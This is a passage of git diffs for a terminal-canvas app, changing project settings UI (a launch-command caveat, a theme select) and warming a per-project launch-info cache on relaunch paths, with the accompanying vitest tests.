+  /** The caveat WINS over the provenance note ("Active" / "Overridden on this machine"): where the
+   *  value comes from hardly matters while nothing consumes it. */
+  const unpairedNote = (f: FieldConfig): string | undefined =>
+    launchCmdUnpaired && f.key === 'launchCmd' ? LAUNCH_CMD_UNPAIRED_NOTE : undefined
+
   const renderShared = (f: FieldConfig): React.JSX.Element => {
     const overridden = resolvedFamily[f.key]?.source === 'local'
     const id = `project-${family}-${f.key}-${projectId}`
-    const overrideNote = overridden ? 'Overridden on this machine' : undefined
+    const overrideNote = unpairedNote(f) ?? (overridden ? 'Overridden on this machine' : undefined)
     if (f.kind === 'switch') {
       return (
         <SwitchField
@@ -666,7 +690,7 @@ function FamilySection({
   const renderLocal = (f: FieldConfig): React.JSX.Element => {
     const active = resolvedFamily[f.key]?.source === 'local'
     const id = `project-${family}-${f.key}-local-${projectId}`
-    const activeNote = active ? 'Active' : undefined
+    const activeNote = unpairedNote(f) ?? (active ? 'Active' : undefined)
     if (f.kind === 'switch') {
       return (
         <SwitchField

--- a/src/renderer/components/settings/TerminalPreview.tsx
+++ b/src/renderer/components/settings/TerminalPreview.tsx
@@ -48,6 +48,9 @@ export function TerminalPreview(): React.JSX.Element {
   const hostRef = useRef<HTMLDivElement>(null)
   const termRef = useRef<Terminal | null>(null)
 
+  // No project id, deliberately: this preview exists to show the GLOBAL appearance settings sitting
+  // right beside it. Scoping it to the active project would repaint the picture with that project's
+  // override, so the row the user is dragging would appear to do nothing.
   const visual = useXtermVisualSettings()
 
   useEffect(() => {

--- a/src/renderer/components/settings/project-settings-launch-note.test.tsx
+++ b/src/renderer/components/settings/project-settings-launch-note.test.tsx
@@ -1,0 +1,102 @@
+// @vitest-environment jsdom
+//
+// Settings → Project → Agents: the "this launch command does nothing" caveat.
+//
+// The launch layer (`workspace.ts agentLaunchOverride`) consumes a project's `launchCmd` ONLY for
+// the agent that same project names in `defaultAgentId`, and deliberately never falls back to this
+// machine's global default agent. That makes a launchCmd typed without a default agent id INERT —
+// and an inert setting that looks saved is a lie the panel has to correct on the row itself.
+import { describe, it, expect, beforeEach, afterEach } from 'vitest'
+import { act } from 'react'
+import { createRoot, type Root } from 'react-dom/client'
+import type { ResolvedProjectSettings } from '@shared/project-settings'
+import { LAUNCH_CMD_UNPAIRED_NOTE, ProjectFamilyEditors } from './ProjectSettingsFamilies'
+
+;(globalThis as { IS_REACT_ACT_ENVIRONMENT?: boolean }).IS_REACT_ACT_ENVIRONMENT = true
+
+let root: Root
+let host: HTMLElement
+
+const resolved = (agents: ResolvedProjectSettings['agents']): ResolvedProjectSettings => ({
+  setup: {},
+  worktree: {},
+  agents,
+  terminal: {}
+})
+
+function mount(agents: ResolvedProjectSettings['agents']): void {
+  host = document.createElement('div')
+  document.body.appendChild(host)
+  root = createRoot(host)
+  act(() =>
+    root.render(
+      <ProjectFamilyEditors
+        projectId="p1"
+        snapshot={{ shared: null, local: undefined }}
+        resolved={resolved(agents)}
+        conflict={false}
+        sharedEditable
+        canRun
+        saveShared={async () => true}
+        saveLocal={async () => true}
+        reload={() => {}}
+      />
+    )
+  )
+}
+
+/** Every field row whose visible label is `label` (the shared row and its "this machine" twin). */
+function rows(label: string): HTMLElement[] {
+  return [...host.querySelectorAll('label')]
+    .filter((el) => el.textContent === label)
+    .map((el) => el.parentElement as HTMLElement)
+}
+
+const noteCount = (): number => (host.textContent ?? '').split(LAUNCH_CMD_UNPAIRED_NOTE).length - 1
+
+beforeEach(() => {
+  ;(window as unknown as { nodeTerminal: unknown }).nodeTerminal = {}
+})
+
+afterEach(() => {
+  act(() => root.unmount())
+  host.remove()
+})
+
+describe('Agents family — the unpaired launch command note', () => {
+  it('warns on BOTH launch-command rows when a launchCmd is set with no default agent id', () => {
+    mount({ launchCmd: { value: 'nix develop -c claude', source: 'shared' } })
+    const launchRows = rows('Launch command')
+    expect(launchRows).toHaveLength(2) // shared + "this machine"
+    for (const row of launchRows) expect(row.textContent).toContain(LAUNCH_CMD_UNPAIRED_NOTE)
+    // On the launchCmd rows and nowhere else — the caveat is about that field.
+    expect(noteCount()).toBe(2)
+    for (const row of rows('Default agent')) {
+      expect(row.textContent).not.toContain(LAUNCH_CMD_UNPAIRED_NOTE)
+    }
+  })
+
+  it('warns for a launchCmd this machine set locally too — pairing, not provenance', () => {
+    mount({ launchCmd: { value: 'nix develop -c claude', source: 'local' } })
+    expect(noteCount()).toBe(2)
+  })
+
+  it('says nothing once the project also names its default agent', () => {
+    mount({
+      defaultAgentId: { value: 'claude', source: 'shared' },
+      launchCmd: { value: 'nix develop -c claude', source: 'shared' }
+    })
+    expect(noteCount()).toBe(0)
+    // The provenance note the caveat displaces is back where it belongs.
+    expect(rows('Launch command')[0].textContent).not.toContain(LAUNCH_CMD_UNPAIRED_NOTE)
+  })
+
+  it('says nothing when the project sets no launch command at all', () => {
+    mount({ defaultAgentId: { value: 'claude', source: 'shared' } })
+    expect(noteCount()).toBe(0)
+    act(() => root.unmount())
+    host.remove()
+    mount({})
+    expect(noteCount()).toBe(0)
+  })
+})

--- a/src/renderer/components/settings/project-settings-terminal-theme.test.tsx
+++ b/src/renderer/components/settings/project-settings-terminal-theme.test.tsx
@@ -1,0 +1,168 @@
+// @vitest-environment jsdom
+//
+// Settings → Project → Terminal: the theme row is a SELECT over the ids this build ships, not a
+// free-text box — and the two copy corrections that ride with it.
+//
+// A typed theme id was unverifiable: the merge (`mergeProjectVisuals`) ignores an id it does not
+// know, so a typo left the terminal on the global theme with nothing on screen saying why. The
+// Select removes the failure mode; what it must NOT do is erase a value it does not recognise —
+// a teammate's newer theme, or one since removed, is a real value in a real document.
+import { describe, it, expect, beforeEach, afterEach } from 'vitest'
+import { act } from 'react'
+import { createRoot, type Root } from 'react-dom/client'
+import type { ProjectSettingsDoc, ResolvedProjectSettings } from '@shared/project-settings'
+import { TERMINAL_THEMES } from '@renderer/terminal/themes'
+import { ProjectFamilyEditors } from './ProjectSettingsFamilies'
+
+;(globalThis as { IS_REACT_ACT_ENVIRONMENT?: boolean }).IS_REACT_ACT_ENVIRONMENT = true
+
+let root: Root
+let host: HTMLElement
+let sharedWrites: ProjectSettingsDoc[] = []
+let localWrites: (ProjectSettingsDoc | undefined)[] = []
+
+const EMPTY: ResolvedProjectSettings = { setup: {}, worktree: {}, agents: {}, terminal: {} }
+
+function mount(opts: {
+  shared?: ProjectSettingsDoc
+  local?: ProjectSettingsDoc
+  resolved?: ResolvedProjectSettings
+}): void {
+  host = document.createElement('div')
+  document.body.appendChild(host)
+  root = createRoot(host)
+  act(() =>
+    root.render(
+      <ProjectFamilyEditors
+        projectId="p1"
+        snapshot={{
+          shared: opts.shared
+            ? { version: 1, rev: 1, savedAt: '2026-08-19T00:00:00.000Z', ...opts.shared }
+            : null,
+          local: opts.local
+        }}
+        resolved={opts.resolved ?? EMPTY}
+        conflict={false}
+        sharedEditable
+        canRun
+        saveShared={async (doc) => {
+          sharedWrites.push(doc)
+          return true
+        }}
+        saveLocal={async (update) => {
+          localWrites.push(update(opts.local))
+          return true
+        }}
+        reload={() => {}}
+      />
+    )
+  )
+}
+
+/** The two theme controls: the shared row's select, then its "this machine" twin. */
+function themeSelects(): HTMLSelectElement[] {
+  return [
+    host.querySelector('#project-terminal-theme-p1') as HTMLSelectElement,
+    host.querySelector('#project-terminal-theme-local-p1') as HTMLSelectElement
+  ]
+}
+
+const optionValues = (sel: HTMLSelectElement): string[] => [...sel.options].map((o) => o.value)
+
+beforeEach(() => {
+  ;(window as unknown as { nodeTerminal: unknown }).nodeTerminal = {}
+  sharedWrites = []
+  localWrites = []
+})
+
+afterEach(() => {
+  act(() => root.unmount())
+  host.remove()
+})
+
+describe('Terminal family — the theme Select', () => {
+  it('offers inherit plus every theme this build ships, on both rows', () => {
+    mount({})
+    const selects = themeSelects()
+    expect(selects[0]).toBeTruthy()
+    expect(selects[1]).toBeTruthy()
+    for (const sel of selects) {
+      // The REAL id list, read from the same module the renderer resolves against — a hand-written
+      // copy here would let the two drift silently.
+      expect(optionValues(sel)).toEqual(['', ...TERMINAL_THEMES.map((t) => t.id)])
+      expect(sel.options[0].textContent).toMatch(/inherit/i)
+      // Not a placeholder list: the ids are the ones the terminal actually resolves.
+      expect(optionValues(sel)).toContain('nodeterm-dark')
+      expect(optionValues(sel)).toContain('catppuccin-mocha')
+    }
+    expect(selects[0].value).toBe('') // unset reads as inherit, not as a theme
+  })
+
+  it('shows the stored id on the row that stores it', () => {
+    mount({ shared: { terminal: { theme: 'dracula' } }, local: { terminal: { theme: 'nord' } } })
+    const [shared, local] = themeSelects()
+    expect(shared.value).toBe('dracula')
+    expect(local.value).toBe('nord')
+  })
+
+  it('keeps an id this build does not know readable instead of showing it as inherit', () => {
+    mount({ shared: { terminal: { theme: 'from-a-newer-version' } } })
+    const [shared, local] = themeSelects()
+    expect(shared.value).toBe('from-a-newer-version')
+    expect([...shared.options].at(-1)?.textContent).toContain('from-a-newer-version')
+    // Only where the value actually is — the local row sets nothing and stays on inherit.
+    expect(local.value).toBe('')
+    expect(optionValues(local)).not.toContain('from-a-newer-version')
+  })
+
+  it('writes the picked id, and clears the field when inherit is picked', () => {
+    mount({ shared: { terminal: { theme: 'dracula' } } })
+    const [shared] = themeSelects()
+    act(() => {
+      shared.value = 'nord'
+      shared.dispatchEvent(new Event('change', { bubbles: true }))
+    })
+    expect(sharedWrites).toEqual([{ terminal: { theme: 'nord' } }])
+    act(() => {
+      shared.value = ''
+      shared.dispatchEvent(new Event('change', { bubbles: true }))
+    })
+    expect(sharedWrites[1]).toEqual({ terminal: { theme: undefined } })
+  })
+
+  it('writes a local pick to the local overlay, leaving the shared document alone', () => {
+    mount({ shared: { terminal: { theme: 'dracula' } } })
+    const [, local] = themeSelects()
+    act(() => {
+      local.value = 'tokyo-night'
+      local.dispatchEvent(new Event('change', { bubbles: true }))
+    })
+    expect(localWrites).toEqual([{ terminal: { theme: 'tokyo-night' } }])
+    expect(sharedWrites).toEqual([])
+  })
+
+  it('names the local row distinctly from its shared twin, for a screen reader', () => {
+    mount({})
+    const [shared, local] = themeSelects()
+    expect(shared.getAttribute('aria-label')).toBeNull() // named by its own <label>
+    expect(local.getAttribute('aria-label')).toBe('Theme (this machine)')
+  })
+})
+
+describe('Setup family copy — what the rows actually promise', () => {
+  it('names every trigger the setup script runs on, not just creation', () => {
+    mount({})
+    const text = host.textContent ?? ''
+    expect(text).toContain('created, adopted, or re-bound to a group')
+  })
+
+  // The switch never held a terminal back: the node opens either way. What waits is its QUEUED
+  // LAUNCH COMMAND (`launchesToFire`'s setup gate).
+  it('describes waitForSetup as holding the queued command, not the terminal', () => {
+    mount({})
+    const text = host.textContent ?? ''
+    expect(text).toContain('Hold queued launch commands until the setup script finishes')
+    expect(text).toContain('only their queued command waits')
+    expect(text).not.toContain('before opening a terminal')
+  })
+})

--- a/src/renderer/components/settings/useProjectSettings.ts
+++ b/src/renderer/components/settings/useProjectSettings.ts
@@ -7,6 +7,7 @@ import {
   type ProjectSettingsSnapshot,
   type ResolvedProjectSettings
 } from '@shared/project-settings'
+import { ensureProjectLaunchInfo, invalidateProjectLaunchInfo } from '../../state/projectLaunchInfo'
 
 /**
  * One project's `.nodeterm/settings.json` (the git-shared doc) plus this machine's local overlay,
@@ -152,6 +153,11 @@ export function useProjectSettings(projectId: string): ProjectSettingsHook {
       writeSeqRef.current += 1
       pendingRef.current = { projectId, doc: next }
       reload()
+      // A shared write can change what a launch needs to know (a new/edited launchCmd, a new
+      // trust-relevant shell) — drop the stale launch-info snapshot and re-warm it, same pair
+      // `onTrustChanged` runs on Canvas.
+      invalidateProjectLaunchInfo(projectId)
+      void ensureProjectLaunchInfo(projectId)
       return true
     },
     [projectId, reload]
@@ -176,6 +182,10 @@ export function useProjectSettings(projectId: string): ProjectSettingsHook {
       writeSeqRef.current += 1
       pendingLocalRef.current = { projectId, local: next }
       reload()
+      // A local overlay change can flip which value (local vs shared) a launch would consume —
+      // same re-warm as `saveShared`.
+      invalidateProjectLaunchInfo(projectId)
+      void ensureProjectLaunchInfo(projectId)
       return true
     },
     [projectId, reload]

--- a/src/renderer/nodes/TerminalNode.tsx
+++ b/src/renderer/nodes/TerminalNode.tsx
@@ -59,6 +59,7 @@ import {
   type SessionLife
 } from '../terminal/terminal-config'
 import { useXtermVisualSettings } from '../terminal/useXtermVisualSettings'
+import { ensureProjectLaunchInfo } from '../state/projectLaunchInfo'
 import { loseWebglContexts, registerWebglClient, type WebglClientHandle } from '../terminal/webgl-budget'
 import { quantizeCharSize } from '../terminal/char-size-quantize'
 import {
@@ -203,6 +204,33 @@ export function sshConnectionScope(conn: SshConnection): string {
  */
 export function owningProjectId(): string {
   return useProjects.getState().activeProjectId
+}
+
+/**
+ * The owning project id, with its launch-info snapshot WARM — for the three already-async relaunch
+ * paths below (cold restore, in-place restart, hibernation wake).
+ *
+ * `agentLaunchOverride` reads `projectLaunchInfoNow` SYNCHRONOUSLY and fails open to the global
+ * layer when the project is still cold. That is right for a fresh launch (it must never block), but
+ * on COLD RESTORE it silently dropped the project's wrapper at the one moment it matters most: the
+ * relaunch fires from a node's mount, racing the very first `ensureProjectLaunchInfo` of the
+ * session, so a whole canvas could come back through the bare CLI — no env, no account setup —
+ * with nothing to show for it. These paths are already asynchronous (they await the permission-mode
+ * probe), so one bounded warm-up costs them nothing they were not already paying.
+ *
+ * Bounded and never-rejecting BY CONSTRUCTION (see `ensureProjectLaunchInfo`: it resolves on its own
+ * ENSURE_WAIT_MS timeout and swallows every error), so this cannot hang or break a relaunch — a
+ * project that stays cold resolves exactly as it did before.
+ *
+ * The id is read ONCE, before the await, and returned — so the snapshot that was warmed and the
+ * project the override is resolved for are the same one even if the active project changes while
+ * the round trip is in flight. Deliberately NOT applied to the synchronous fresh-launch factory
+ * (`createAgentNode`), which has no await to hide this behind.
+ */
+async function warmOwningProjectId(): Promise<string> {
+  const projectId = owningProjectId()
+  await ensureProjectLaunchInfo(projectId)
+  return projectId
 }
 
 /** The live ControlMaster path a remote node would run over, if any. Lets the caller tell "we will
@@ -2883,6 +2911,11 @@ export function TerminalNode({
           // re-claims its own thread instead of joining as an anonymous client. `data.ssh` /
           // `data.sshRemoteTmux` keep a remote node on the bare command (no launcher on the host).
           const mode = await ensureActivePermissionMode(agentId)
+          // …and the project's launch-info snapshot, for the same reason and with the same shape:
+          // this runs at MOUNT, so on a cold boot it is racing the session's very first fetch, and
+          // the synchronous `agentLaunchOverride` read below would answer "no project settings" for
+          // a whole canvas of restoring nodes. Bounded and never-rejecting (see the helper).
+          const ownerProjectId = await warmOwningProjectId()
           const shared = codexSharedIdentity(data.ssh || data.sshRemoteTmux)
           const customAgent = agentConfig(agentId)
             ? undefined
@@ -2897,9 +2930,9 @@ export function TerminalNode({
               sharedIdentity: shared,
               // The launch-command override rides the relaunch too, so a wrapper user's node comes
               // back through its wrapper after a reboot — the moment env/account setup matters.
-              // Scoped to the OWNING project (`owningProjectId`) so a project-level wrapper does
+              // Scoped to the OWNING project (`warmOwningProjectId`) so a project-level wrapper does
               // not vanish on cold restore, which is exactly where it is most needed.
-              launchCmdOverride: agentLaunchOverride(agentId, owningProjectId())
+              launchCmdOverride: agentLaunchOverride(agentId, ownerProjectId)
             },
             // The boot-time desktop env snapshot — the same object fresh launch and the Settings
             // preview expand against, so a ${env:…}-referencing custom agent cold-restores with
@@ -3051,6 +3084,10 @@ export function TerminalNode({
         const launchEnv = customTarget
           ? await api.agent.envSnapshot().catch(() => ({}))
           : {}
+        // Warm the owning project before the SYNCHRONOUS override read below — a restart can be the
+        // first thing a user does after a boot, and a cold snapshot would silently relaunch through
+        // the bare CLI. Bounded and never-rejecting (see `warmOwningProjectId`).
+        const ownerProjectId = await warmOwningProjectId()
         const { command, missingEnv } = assembleResumeCommand(
           {
             agentId: target,
@@ -3061,7 +3098,7 @@ export function TerminalNode({
             // The launch-command override rides the restart too (the global layer is undefined for
             // a custom target, which already owns its launchCmd) — it is a property of how the
             // agent launches, so the owning project's own value applies here as well.
-            launchCmdOverride: agentLaunchOverride(target, owningProjectId())
+            launchCmdOverride: agentLaunchOverride(target, ownerProjectId)
           },
           launchEnv
         )
@@ -3170,6 +3207,9 @@ export function TerminalNode({
         const customAgent = agentConfig(agentId)
           ? undefined
           : useSettings.getState().settings.customAgents.find((c) => c.id === agentId)
+        // Same warm-up as the cold-restore and restart paths: the override read inside the builder
+        // is synchronous, and a wake can be the first launch after a boot. Bounded, never rejects.
+        const ownerProjectId = await warmOwningProjectId()
         const { command } = assembleResumeCommand(
           {
             agentId,
@@ -3179,7 +3219,7 @@ export function TerminalNode({
             sharedIdentity: false,
             // The launch-command override lives on the user's own PATH (or is an absolute path),
             // not in a generated launcher dir, so it rides the wake too — project layer included.
-            launchCmdOverride: agentLaunchOverride(agentId, owningProjectId())
+            launchCmdOverride: agentLaunchOverride(agentId, ownerProjectId)
           },
           // Same boot-time env snapshot as fresh launch / cold restore, so a wake types the same
           // line the node launched with (empty on browser/relay by design).

--- a/src/renderer/nodes/TerminalNode.tsx
+++ b/src/renderer/nodes/TerminalNode.tsx
@@ -201,7 +201,7 @@ export function sshConnectionScope(conn: SshConnection): string {
  * in the active project's React Flow (same reasoning `sshConnectionScope` states), so the active
  * project is its owner; an SSH project's own nodes answer the same id either way.
  */
-function owningProjectId(): string {
+export function owningProjectId(): string {
   return useProjects.getState().activeProjectId
 }
 
@@ -979,7 +979,9 @@ export function TerminalNode({
   // field it actually uses changes — not on every unrelated settings edit.
   const panHoverDelay = useSettings((s) => s.settings.panHoverDelay)
   // One shallow-compared subscription for the whole appearance slice — see useXtermVisualSettings.
-  const visual = useXtermVisualSettings()
+  // Scoped to the OWNING project so its `terminal.theme` / `terminal.fontFamily` layer over the
+  // global settings for this node, and for no other project's nodes.
+  const visual = useXtermVisualSettings(owningProjectId())
   const claudeAccounts = useSettings((s) => s.settings.claudeAccounts)
   // Header buttons the user chose to hide (Settings). A selector, so toggling one re-renders every
   // mounted node right away instead of waiting for a remount. Search, Close and the worktree-move

--- a/src/renderer/nodes/TerminalNode.tsx
+++ b/src/renderer/nodes/TerminalNode.tsx
@@ -190,6 +190,21 @@ export function sshConnectionScope(conn: SshConnection): string {
   return sshConnectionIdForProject(activeProjectId, conn, getProject(activeProjectId)?.ssh?.server)
 }
 
+/**
+ * The project whose per-project settings apply to a node in THIS canvas — for the launch-command
+ * layer (`agentLaunchOverride`) on relaunch, restart and wake.
+ *
+ * The active project, deliberately, and NOT `sshConnectionScope`'s answer: that scope is a
+ * CONNECTION identity, which for a remote node attached to a foreign host is a synthetic
+ * project×host attachment id (`sshAttachmentId`) rather than a project id at all — passing it here
+ * would silently resolve to "no project settings" for exactly those nodes. A node only ever exists
+ * in the active project's React Flow (same reasoning `sshConnectionScope` states), so the active
+ * project is its owner; an SSH project's own nodes answer the same id either way.
+ */
+function owningProjectId(): string {
+  return useProjects.getState().activeProjectId
+}
+
 /** The live ControlMaster path a remote node would run over, if any. Lets the caller tell "we will
  *  resolve in a microtask" from "we are about to sit in the wait below" without duplicating the
  *  lookup. Without a `conn` it answers for the active project's own connection. */
@@ -2878,9 +2893,11 @@ export function TerminalNode({
               permissionMode: mode,
               model: data.agentModel,
               sharedIdentity: shared,
-              // The user's launch-command override rides the relaunch too, so a wrapper user's node
-              // comes back through its wrapper after a reboot — the moment env/account setup matters.
-              launchCmdOverride: agentLaunchOverride(agentId)
+              // The launch-command override rides the relaunch too, so a wrapper user's node comes
+              // back through its wrapper after a reboot — the moment env/account setup matters.
+              // Scoped to the OWNING project (`owningProjectId`) so a project-level wrapper does
+              // not vanish on cold restore, which is exactly where it is most needed.
+              launchCmdOverride: agentLaunchOverride(agentId, owningProjectId())
             },
             // The boot-time desktop env snapshot — the same object fresh launch and the Settings
             // preview expand against, so a ${env:…}-referencing custom agent cold-restores with
@@ -3039,9 +3056,10 @@ export function TerminalNode({
             sessionId: agentSessionId,
             permissionMode: await ensureActivePermissionMode(target),
             model: selectedModel ?? undefined,
-            // The per-builtin launch-command override rides the restart too (undefined for a custom
-            // target, which already owns its launchCmd) — it is a property of how the agent launches.
-            launchCmdOverride: agentLaunchOverride(target)
+            // The launch-command override rides the restart too (the global layer is undefined for
+            // a custom target, which already owns its launchCmd) — it is a property of how the
+            // agent launches, so the owning project's own value applies here as well.
+            launchCmdOverride: agentLaunchOverride(target, owningProjectId())
           },
           launchEnv
         )
@@ -3157,9 +3175,9 @@ export function TerminalNode({
             sessionId: agentSessionId,
             permissionMode: await ensureActivePermissionMode(agentId),
             sharedIdentity: false,
-            // The USER's launch-command override lives on their own PATH (or is an absolute path),
-            // not in a generated launcher dir, so it rides the wake too.
-            launchCmdOverride: agentLaunchOverride(agentId)
+            // The launch-command override lives on the user's own PATH (or is an absolute path),
+            // not in a generated launcher dir, so it rides the wake too — project layer included.
+            launchCmdOverride: agentLaunchOverride(agentId, owningProjectId())
           },
           // Same boot-time env snapshot as fresh launch / cold restore, so a wake types the same
           // line the node launched with (empty on browser/relay by design).

--- a/src/renderer/state/projectLaunchInfo.test.ts
+++ b/src/renderer/state/projectLaunchInfo.test.ts
@@ -94,6 +94,35 @@ describe('ensureProjectLaunchInfo', () => {
     await vi.advanceTimersByTimeAsync(0)
     expect(projectLaunchInfoNow('p1')).toEqual(INFO)
   })
+
+  // The wire call this project's first fetch is waiting on may NEVER answer at all — a dropped
+  // Server Edition WS-RPC request neither times out nor rejects (permissionMode.ts's
+  // `CAPS_WAIT_MS` doc). Without clearing the in-flight entry on timeout, every later `ensure`
+  // for this project would just rejoin that exhausted promise and no fresh wire call would ever
+  // be issued again.
+  it('a timed-out fetch is retried on the NEXT ensure, and its late answer cannot clobber the retry', async () => {
+    vi.useFakeTimers()
+    let resolveStale!: (v: ProjectLaunchInfo | null) => void
+    const staleInfo: ProjectLaunchInfo = { ...INFO, trusted: { agents: false, shell: true } }
+    const freshInfo: ProjectLaunchInfo = { ...INFO, trusted: { agents: true, shell: true } }
+    // Gated — never answers on its own until `resolveStale` is called.
+    const fn = mockLaunchInfo(() => new Promise((r) => (resolveStale = r)))
+
+    const first = ensureProjectLaunchInfo('p1')
+    await vi.advanceTimersByTimeAsync(3000)
+    await first // gave up waiting
+
+    fn.mockImplementation(() => Promise.resolve(freshInfo))
+    await ensureProjectLaunchInfo('p1') // must issue a SECOND wire call, not rejoin the first
+    expect(fn).toHaveBeenCalledTimes(2)
+    expect(projectLaunchInfoNow('p1')).toEqual(freshInfo)
+
+    // The abandoned first fetch finally answers — its write must be discarded, never overwrite
+    // the retry's fresher result (the generation guard).
+    resolveStale(staleInfo)
+    await vi.advanceTimersByTimeAsync(0)
+    expect(projectLaunchInfoNow('p1')).toEqual(freshInfo)
+  })
 })
 
 describe('invalidateProjectLaunchInfo', () => {

--- a/src/renderer/state/projectLaunchInfo.test.ts
+++ b/src/renderer/state/projectLaunchInfo.test.ts
@@ -1,0 +1,151 @@
+import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'
+import type { ProjectLaunchInfo } from '@shared/project-settings'
+import {
+  ensureProjectLaunchInfo,
+  invalidateProjectLaunchInfo,
+  projectLaunchInfoNow,
+  resetProjectLaunchInfoForTests
+} from './projectLaunchInfo'
+
+const INFO: ProjectLaunchInfo = {
+  resolved: { setup: {}, worktree: {}, agents: {}, terminal: {} },
+  trusted: { agents: true, shell: true }
+}
+
+/** Stand in for the preload/bridge `projectSettings.launchInfo()` call. */
+function mockLaunchInfo(
+  answer: ProjectLaunchInfo | null | Error | (() => Promise<ProjectLaunchInfo | null>)
+): ReturnType<typeof vi.fn> {
+  const fn = vi.fn(() => {
+    if (typeof answer === 'function') return answer()
+    return answer instanceof Error ? Promise.reject(answer) : Promise.resolve(answer)
+  })
+  ;(globalThis as { window?: unknown }).window = {
+    nodeTerminal: { projectSettings: { launchInfo: fn } }
+  }
+  return fn
+}
+
+beforeEach(() => {
+  resetProjectLaunchInfoForTests()
+})
+
+afterEach(() => {
+  vi.useRealTimers()
+})
+
+describe('projectLaunchInfoNow', () => {
+  it('is null before anything has ever been fetched', () => {
+    expect(projectLaunchInfoNow('p1')).toBeNull()
+  })
+
+  it('holds the fetched value once ensure resolves', async () => {
+    mockLaunchInfo(INFO)
+    await ensureProjectLaunchInfo('p1')
+    expect(projectLaunchInfoNow('p1')).toEqual(INFO)
+  })
+
+  it('is scoped per project — fetching one project never populates another', async () => {
+    mockLaunchInfo(INFO)
+    await ensureProjectLaunchInfo('p1')
+    expect(projectLaunchInfoNow('p1')).toEqual(INFO)
+    expect(projectLaunchInfoNow('p2')).toBeNull()
+  })
+})
+
+describe('ensureProjectLaunchInfo', () => {
+  it('memoizes an in-flight fetch — two concurrent callers trigger one wire call', async () => {
+    let resolve!: (v: ProjectLaunchInfo | null) => void
+    const fn = mockLaunchInfo(() => new Promise((r) => (resolve = r)))
+    const a = ensureProjectLaunchInfo('p1')
+    const b = ensureProjectLaunchInfo('p1')
+    await Promise.resolve() // let the mock's executor run so `resolve` is bound
+    resolve(INFO)
+    await Promise.all([a, b])
+    expect(fn).toHaveBeenCalledTimes(1)
+    expect(projectLaunchInfoNow('p1')).toEqual(INFO)
+  })
+
+  it('never rejects when the wire call rejects — the cache is left as-is (fail open)', async () => {
+    mockLaunchInfo(new Error('rpc down'))
+    await expect(ensureProjectLaunchInfo('p1')).resolves.toBeUndefined()
+    expect(projectLaunchInfoNow('p1')).toBeNull()
+  })
+
+  it('is bounded — a wire call that never answers still resolves ensure within the wait window', async () => {
+    vi.useFakeTimers()
+    mockLaunchInfo(() => new Promise<ProjectLaunchInfo | null>(() => {}))
+    const pending = ensureProjectLaunchInfo('p1')
+    await vi.advanceTimersByTimeAsync(3000)
+    await expect(pending).resolves.toBeUndefined()
+    // The bounded timeout gave up on the round trip — nothing to show yet.
+    expect(projectLaunchInfoNow('p1')).toBeNull()
+  })
+
+  it('a late answer after the bound still lands in the cache for the NEXT read', async () => {
+    vi.useFakeTimers()
+    let resolve!: (v: ProjectLaunchInfo | null) => void
+    mockLaunchInfo(() => new Promise((r) => (resolve = r)))
+    const pending = ensureProjectLaunchInfo('p1')
+    await vi.advanceTimersByTimeAsync(3000)
+    await pending // gave up waiting
+    expect(projectLaunchInfoNow('p1')).toBeNull()
+    resolve(INFO)
+    await vi.advanceTimersByTimeAsync(0)
+    expect(projectLaunchInfoNow('p1')).toEqual(INFO)
+  })
+})
+
+describe('invalidateProjectLaunchInfo', () => {
+  it('clears the cached value back to null', async () => {
+    mockLaunchInfo(INFO)
+    await ensureProjectLaunchInfo('p1')
+    expect(projectLaunchInfoNow('p1')).toEqual(INFO)
+    invalidateProjectLaunchInfo('p1')
+    expect(projectLaunchInfoNow('p1')).toBeNull()
+  })
+
+  it('only clears the invalidated project', async () => {
+    mockLaunchInfo(INFO)
+    await ensureProjectLaunchInfo('p1')
+    await ensureProjectLaunchInfo('p2')
+    invalidateProjectLaunchInfo('p1')
+    expect(projectLaunchInfoNow('p1')).toBeNull()
+    expect(projectLaunchInfoNow('p2')).toEqual(INFO)
+  })
+
+  it('rewarm after a trust change: invalidate then ensure fetches a fresh answer', async () => {
+    const untrusted: ProjectLaunchInfo = { ...INFO, trusted: { agents: false, shell: true } }
+    const fn = mockLaunchInfo(untrusted)
+    await ensureProjectLaunchInfo('p1')
+    expect(projectLaunchInfoNow('p1')?.trusted.agents).toBe(false)
+
+    // The trust dialog was answered — a later fetch now reports true. Simulates the
+    // `onTrustChanged` handler's invalidate+ensure pair.
+    fn.mockImplementation(() => Promise.resolve({ ...INFO, trusted: { agents: true, shell: true } }))
+    invalidateProjectLaunchInfo('p1')
+    expect(projectLaunchInfoNow('p1')).toBeNull()
+    await ensureProjectLaunchInfo('p1')
+    expect(projectLaunchInfoNow('p1')?.trusted.agents).toBe(true)
+    expect(fn).toHaveBeenCalledTimes(2)
+  })
+
+  it('a fetch already in flight when invalidate fires does not clobber a fresher one', async () => {
+    let resolveStale!: (v: ProjectLaunchInfo | null) => void
+    const staleInfo: ProjectLaunchInfo = { ...INFO, trusted: { agents: false, shell: true } }
+    const freshInfo: ProjectLaunchInfo = { ...INFO, trusted: { agents: true, shell: true } }
+    const fn = mockLaunchInfo(() => new Promise((r) => (resolveStale = r)))
+
+    const stale = ensureProjectLaunchInfo('p1') // in flight, unresolved
+    await Promise.resolve() // let the mock's executor run so `resolveStale` is bound
+    invalidateProjectLaunchInfo('p1') // abandons it — bumps the generation
+    fn.mockImplementation(() => Promise.resolve(freshInfo))
+    await ensureProjectLaunchInfo('p1') // a fresh fetch, resolves immediately
+    expect(projectLaunchInfoNow('p1')).toEqual(freshInfo)
+
+    // The abandoned fetch finally answers — its write must be discarded, not overwrite `freshInfo`.
+    resolveStale(staleInfo)
+    await stale
+    expect(projectLaunchInfoNow('p1')).toEqual(freshInfo)
+  })
+})

--- a/src/renderer/state/projectLaunchInfo.ts
+++ b/src/renderer/state/projectLaunchInfo.ts
@@ -1,4 +1,6 @@
+import { create } from 'zustand'
 import type { ProjectLaunchInfo } from '@shared/project-settings'
+import type { ProjectVisualOverrides } from '../terminal/terminal-config'
 
 /**
  * Warmed renderer cache of `project-settings:launch-info` (`projectLaunchInfoNow` /
@@ -34,6 +36,60 @@ const generation = new Map<string, number>()
 /** How long `ensureProjectLaunchInfo` waits on the round trip before giving up on it — same bound
  *  as `permissionMode.ts`'s `CAPS_WAIT_MS`. A launch must never block on this. */
 const ENSURE_WAIT_MS = 3000
+
+/**
+ * The REACTIVE mirror of the cache above — and only of the two cosmetic terminal values
+ * (`terminal.theme` / `terminal.fontFamily`), never of the trust verdict.
+ *
+ * The cache is deliberately not a store: a launch READS it at the moment it launches, so nothing
+ * needs to re-render when it changes. Live terminal appearance is the one consumer that does — a
